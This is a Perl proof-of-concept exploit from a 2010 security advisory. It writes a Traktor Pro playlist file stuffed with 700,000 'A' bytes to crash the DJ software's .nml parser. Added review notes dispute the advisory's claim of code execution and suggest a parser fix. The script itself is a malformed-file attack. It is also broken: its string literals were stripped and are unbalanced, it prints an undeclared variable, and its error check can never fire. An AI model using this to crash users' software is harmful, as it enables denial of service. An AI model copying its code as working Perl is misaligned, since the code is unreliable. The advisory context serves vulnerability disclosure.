#!/usr/local/bin/perl
#
#
# Native Instruments Traktor Pro 1.2.6 Stack-based Buffer Overflow Vulnerability
#
#
# Vendor: Native Instruments GmbH
# Product web page: http://www.native-instruments.com
# Affected version: 1.2.6.8491 (Standalone)
#
# Summary: TRAKTOR PRO is the new benchmark in DJ software. Mix digital files
# on four decks, using the high-quality internal mixer or external hardware,
# and the best effects suite around. Fully primed for professional use, TRAKTOR
# PRO redefines the art of DJing.
#
# Desc: Traktor Pro suffers from a stack buffer overflow vulnerability when
# parsing playlist files (.nml) resulting in a crash. The user input is not
# properly sanitized which may give the attackers the possibility for an
# arbitrary code execution on the affected system. Failure of exploitation
# may result in a denial of service.
#
# Tested on: Microsoft Windows XP Professional SP3 (English)
#
#
# -------------------------------------------------------------------
#
# (4418.4608): Stack overflow - code c00000fd (first/second chance not available)
# eax=14250000 ebx=001cc168 ecx=00000007 edx=7c90e514 esi=001cc140 edi=001cc198
# eip=7c90e514 esp=0ff5e4e4 ebp=0ff5e4f4 iopl=0         nv up ei pl zr na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
# *** ERROR: Symbol file could not be found.  Defaulted to export symbols for ntdll.dll -
# ntdll!KiFastSystemCallRet:
# 7c90e514 c3              ret
#
# -------------------------------------------------------------------
#
#
# Vulnerability discovered by: Gjoko 'LiquidWorm' Krstic
# liquidworm gmail com
#
# Zero Science Lab - http://www.zeroscience.mk
#
# Advisory ID: ZSL-2010-4977
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4977.php
#
# 09.11.2010
#
# NOTE(review): the crash record above is exception code c00000fd
# (STATUS_STACK_OVERFLOW) with EIP sitting at a `ret` inside ntdll, i.e. the
# thread's stack guard page was hit; the trace does not show a saved return
# address overwritten with attacker-controlled bytes. That is consistent with
# a denial of service; the "arbitrary code execution" wording in the
# description is not demonstrated by what is shown here and should be treated
# as unconfirmed.
#
# Mitigation (defender view): the .nml parser should bound the length of
# attribute/text values before copying them into fixed-size or stack-resident
# storage and reject a playlist field of several hundred KB at parse time,
# which is far outside any legitimate value. The exact parser code path is
# not visible from this file.
#

use strict;

# Console banner. The text is the original's; it has only been reflowed into
# its box rows after the source was collapsed onto a single line.
print qq{
-------------------------------------------------------------------------
|                                                                       |
|        Native Instruments Traktor 1.2.6 Stack Overflow PoC            |
|                                                                       |
|                 Copyleft (c) 2010, Zero Science Lab                   |
|                                                                       |
-------------------------------------------------------------------------
};

# 700000 bytes of 0x41 ("A"), intended as the oversized playlist field
# that the advisory says makes the parser crash.
my $bof = "\x41" x 700000;

# NOTE(review): the markup that originally sat inside these two literals
# (the NML/XML prefix and suffix wrapped around the payload) was stripped
# when the page was extracted; as it stands the quoting is unbalanced and
# perl will not parse this file. The literals would have to be recovered
# from the original advisory before this script is runnable at all.
my $start = ' "; my $end = ' ';

my $file = "PoC.nml";

print "\n\n[*] Creating $file playlist file...\n";

# NOTE(review): `||` binds tighter than the comma, so it applies to the
# filename string (always true) and `die` can never fire; a failed open is
# silently ignored. This is also a bareword handle with a 2-arg open.
# Idiomatic form: open my $fh, '>', "./$file" or die "\nCan't open $file: $!";
open nml, ">./$file" || die "\nCan't open $file: $!";

# NOTE(review): $traktor is never declared, so under `use strict` this line
# is a compile-time error ("Global symbol requires explicit package name").
# The only payload variable built above is $bof; presumably that was meant.
print nml $start.$traktor.$end;

print "\n[.] File successfully buffered!\n\n";

# The return value of close is unchecked, so a buffered write error on the
# output file would go unnoticed.
close nml;